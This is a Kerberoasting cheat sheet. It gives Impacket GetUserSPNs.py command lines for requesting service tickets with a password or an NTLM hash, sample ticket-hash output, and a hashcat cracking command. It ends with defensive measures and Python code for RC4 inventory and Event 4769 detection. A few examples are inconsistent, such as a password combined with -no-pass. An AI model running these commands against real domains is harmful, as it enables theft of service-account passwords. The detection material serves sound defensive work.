
Impacket Kerberoasting Cheat Sheet


What is Kerberoasting?

Kerberoasting is an attack where an adversary with any valid domain account requests service tickets for accounts that have Service Principal Names (SPNs) from a Domain Controller, extracts those tickets (which are encrypted with the service account's password hash), and attempts to crack the service accounts' passwords offline.


Pre-requisites

Before running a Kerberoasting attack using Impacket, ensure the following:

  • You have a valid domain user account (low-privilege).
  • Impacket is installed on your system.

Install Impacket:

You can install Impacket using pip:

pip install impacket

Or clone the repository:

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip install .

Kerberoasting Using Impacket

Impacket provides several tools, including GetUserSPNs.py, which can be used for Kerberoasting attacks.

Basic Command:

python3 GetUserSPNs.py <domain>/<username>:<password> -request
  • <domain>: The Active Directory domain (e.g., contoso.local).
  • <username>: The domain user's username.
  • <password>: The password for the domain user.

This will request service tickets (TGS) for accounts with SPNs and output the extracted Kerberos tickets in a hash format that can be cracked.


Command Breakdown

Retrieve SPNs with TGS Tickets:

python3 GetUserSPNs.py <domain>/<username>:<password> -request
  • This command will query for user accounts with associated SPNs and request a service ticket (TGS) for each.
  • The TGS tickets are displayed in a format suitable for cracking (e.g., using hashcat).

Example Usage:

python3 GetUserSPNs.py contoso.local/ryan:Password123 -dc-ip 10.0.0.1 -request
  • -dc-ip: Optional argument to specify the IP of the Domain Controller (if needed).

Specifying Hash Instead of Password:

If you have the NTLM hash of the domain user instead of their password, you can use it like so:

python3 GetUserSPNs.py <domain>/<username> -hashes <LMHASH>:<NTHASH> -request
  • <LMHASH>:<NTHASH>: The LM and NT hashes of the user's password (e.g., aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee).

Example (with hash):

python3 GetUserSPNs.py contoso.local/ryan -hashes :aad3b435b51404eeaad3b435b51404ee -request

Saving Output to a File

You can redirect the output to a file for later use with a cracking tool like hashcat:

python3 GetUserSPNs.py <domain>/<username>:<password> -request > kerberoast_hashes.txt

Cracking Kerberos Tickets with Hashcat

Once you’ve obtained the service ticket hashes, the next step is to crack them offline using a tool like hashcat.

Example Command with Hashcat:

hashcat -m 13100 kerberoast_hashes.txt /path/to/wordlist.txt
  • -m 13100: Specifies the hash type "Kerberos 5, etype 23, TGS-REP", i.e. RC4-encrypted service tickets, which is the format GetUserSPNs.py prints for accounts that accept RC4.
  • kerberoast_hashes.txt: The file containing the TGS hashes written by GetUserSPNs.py.
  • /path/to/wordlist.txt: The wordlist to use for password cracking.

Example Output from Impacket:

$krb5tgs$23$*sqlservice$CONTOSO.LOCAL$contoso.local/sqlservice:88$0c593bb6db76f8a4bf39c7da99173b50$3be75864f120763769f571b13b0379e7bb3c49fa0ef0d6f3f7d4fcf300f519364a5aa23038096adfbecdb929c42124f37f0834656883a7cd02f26ac5c8b243c7bc72b58904c3467d9f640da799c026a6

This can be fed directly into hashcat to begin password cracking.
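To make the fields of that line concrete, here is a small parser, added as an example and not part of the original cheat sheet or of Impacket: it splits a $krb5tgs$23$ line into its parts and reports the encryption type, which is the detail a defender cares most about (the 23 means the service account accepted an RC4 ticket; accounts restricted to AES produce etype 17/18 lines in a different layout and are far more expensive to crack). The first input line is the sample output above, the second is constructed for the example with filler hex, and the hashcat mode numbers are hashcat's own.

```python
import re

# Kerberos encryption-type numbers as they appear after "$krb5tgs$" and the
# hashcat mode that handles each one (hashcat's own mode numbers).
ETYPES = {
    23: ("rc4-hmac", 13100),
    17: ("aes128-cts-hmac-sha1-96", 19600),
    18: ("aes256-cts-hmac-sha1-96", 19700),
}

# Field layout of an etype-23 line as GetUserSPNs.py writes it:
#   $krb5tgs$23$*<user>$<realm>$<spn>*$<16-byte checksum>$<encrypted ticket part>
# The closing '*' after the SPN is accepted as optional so that the sample
# line above, which lacks it, still parses. Lines for etype 17/18 use a
# different layout and are deliberately not matched here.
_RC4_LINE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)"
    r"\$(?P<spn>[^$*]+)\*?\$(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)


def parse_kerberoast_line(line):
    """Split one $krb5tgs$ line into its fields; return None for anything else."""
    m = _RC4_LINE.match(line.strip())
    if m is None:
        return None
    etype = int(m.group("etype"))
    name, mode = ETYPES.get(etype, ("unknown", None))
    return {
        "etype": etype,
        "etype_name": name,
        "hashcat_mode": mode,
        "user": m.group("user"),
        "realm": m.group("realm"),
        "spn": m.group("spn"),
        "checksum": m.group("checksum").lower(),
        # The ticket part is hex-encoded: two hex digits per byte.
        "edata_bytes": len(m.group("edata")) // 2,
    }


def rc4_service_accounts(lines):
    """Sorted (realm, user) pairs whose service tickets were issued with RC4 (etype 23).

    From a defender's view this is the list of accounts that should be moved
    to AES-only (msDS-SupportedEncryptionTypes) or given long random passwords.
    """
    found = set()
    for line in lines:
        parsed = parse_kerberoast_line(line)
        if parsed and parsed["etype"] == 23:
            found.add((parsed["realm"], parsed["user"]))
    return sorted(found)


# First line: the sample output shown above. Second line: constructed for this
# example, the hex content is filler and not a real ticket. Third: noise.
SAMPLE_LINES = [
    "$krb5tgs$23$*sqlservice$CONTOSO.LOCAL$contoso.local/sqlservice:88$0c593bb6db76f8a4bf39c7da99173b50$3be75864f120763769f571b13b0379e7bb3c49fa0ef0d6f3f7d4fcf300f519364a5aa23038096adfbecdb929c42124f37f0834656883a7cd02f26ac5c8b243c7bc72b58904c3467d9f640da799c026a6",
    "$krb5tgs$23$*svc_backup$CONTOSO.LOCAL$contoso.local/svc_backup:1433*$00112233445566778899aabbccddeeff$" + "deadbeef" * 4,
    "not a kerberoast line",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(parse_kerberoast_line(line))
    print(rc4_service_accounts(SAMPLE_LINES))
```

Run it against a saved kerberoast_hashes.txt to get an inventory of which service accounts are still being issued RC4 tickets; each of those is a candidate for an AES-only encryption-type setting.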


Advanced Options

Specify Kerberos Realm:

If you’re working in a multi-domain environment or need to specify a particular realm:

python3 GetUserSPNs.py <domain>/<username>:<password> -request -k -no-pass -target-domain <target-domain>
  • -target-domain: Specify the target domain for the attack.
  • -k: Use Kerberos authentication instead of NTLM.
  • -no-pass: Run the query without supplying a password.

Using Kerberos Tickets (.kirbi files):

If you already have a Kerberos ticket-granting ticket (TGT), you can use it to request service tickets (TGS):

python3 GetUserSPNs.py -k -no-pass -target-domain <target-domain> -request

This command allows the attacker to continue their Kerberoasting attempts using a valid Kerberos TGT.


Defensive Measures

To protect against Kerberoasting, organizations can:

  • Enforce strong, complex passwords for service accounts.
  • Limit which accounts are allowed to have SPNs.
  • Regularly rotate service account passwords.
  • Monitor and restrict the number of TGS requests for service accounts.
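The last bullet is the one that catches the command shown at the top of this page in practice: a single client requesting RC4 service tickets for many different service accounts in a short burst. The detection below is an added example, not part of the original cheat sheet, run over constructed Windows Security Event ID 4769 ("A Kerberos service ticket was requested") records reduced to the fields the logic needs (TicketEncryptionType 0x17 is RC4-HMAC, 0x12 is AES256; machine accounts end in $ and krbtgt is excluded because those tickets are normal traffic). The window and threshold are assumptions to tune per environment.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed, simplified Event ID 4769 records: "requester" is TargetUserName
# (the account asking for the ticket), "service" is ServiceName, "etype" is
# TicketEncryptionType and "status" is the Kerberos result code.
SAMPLE_4769 = [
    {"time": "2024-05-01T09:00:01", "requester": "ryan", "ip": "10.0.0.55", "service": "sqlservice", "etype": "0x17", "status": "0x0"},
    {"time": "2024-05-01T09:00:02", "requester": "ryan", "ip": "10.0.0.55", "service": "svc_backup", "etype": "0x17", "status": "0x0"},
    {"time": "2024-05-01T09:00:02", "requester": "ryan", "ip": "10.0.0.55", "service": "svc_web", "etype": "0x17", "status": "0x0"},
    {"time": "2024-05-01T09:00:03", "requester": "ryan", "ip": "10.0.0.55", "service": "svc_sccm", "etype": "0x17", "status": "0x0"},
    {"time": "2024-05-01T09:00:03", "requester": "ryan", "ip": "10.0.0.55", "service": "WS01$", "etype": "0x17", "status": "0x0"},
    {"time": "2024-05-01T09:30:00", "requester": "alice", "ip": "10.0.0.77", "service": "sqlservice", "etype": "0x12", "status": "0x0"},
    {"time": "2024-05-01T09:31:00", "requester": "alice", "ip": "10.0.0.77", "service": "krbtgt", "etype": "0x12", "status": "0x0"},
]

# RC4-HMAC (0x17) and RC4-HMAC-EXP (0x18); AES tickets are 0x11 / 0x12.
RC4_ETYPES = {"0x17", "0x18"}


def is_candidate(ev):
    """A successful RC4 service ticket for a user (not machine) service account."""
    return (
        ev["status"] == "0x0"
        and ev["etype"].lower() in RC4_ETYPES
        and not ev["service"].endswith("$")
        and ev["service"].lower() != "krbtgt"
    )


def detect_kerberoasting(events, window=timedelta(minutes=5), threshold=3):
    """Alert on (requester, ip) pairs that obtain RC4 tickets for at least
    `threshold` distinct service accounts inside any `window`-long span."""
    per_source = defaultdict(list)
    for ev in events:
        if is_candidate(ev):
            key = (ev["requester"], ev["ip"])
            per_source[key].append((datetime.fromisoformat(ev["time"]), ev["service"]))

    alerts = []
    for (requester, ip), reqs in per_source.items():
        reqs.sort()
        best = set()
        start = 0
        # Sliding window over the time-ordered requests of this source.
        for end in range(len(reqs)):
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            services = {svc for _, svc in reqs[start:end + 1]}
            if len(services) > len(best):
                best = services
        if len(best) >= threshold:
            alerts.append({
                "requester": requester,
                "ip": ip,
                "services": sorted(best),
                "first_seen": reqs[0][0].isoformat(),
            })
    return alerts


def rc4_tickets_by_service(events):
    """How many RC4 tickets each user service account was issued: the accounts
    that show up here are the ones that can still be roasted with mode 13100."""
    return Counter(ev["service"] for ev in events if is_candidate(ev))


if __name__ == "__main__":
    for alert in detect_kerberoasting(SAMPLE_4769):
        print("possible Kerberoasting:", alert)
    print("RC4 tickets per service account:", dict(rc4_tickets_by_service(SAMPLE_4769)))
```

Feeding real 4769 events into the same two functions gives both the alert (a burst of RC4 tickets from one source) and the inventory (which service accounts still accept RC4 at all), which is the list to work through when enforcing AES and rotating passwords.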
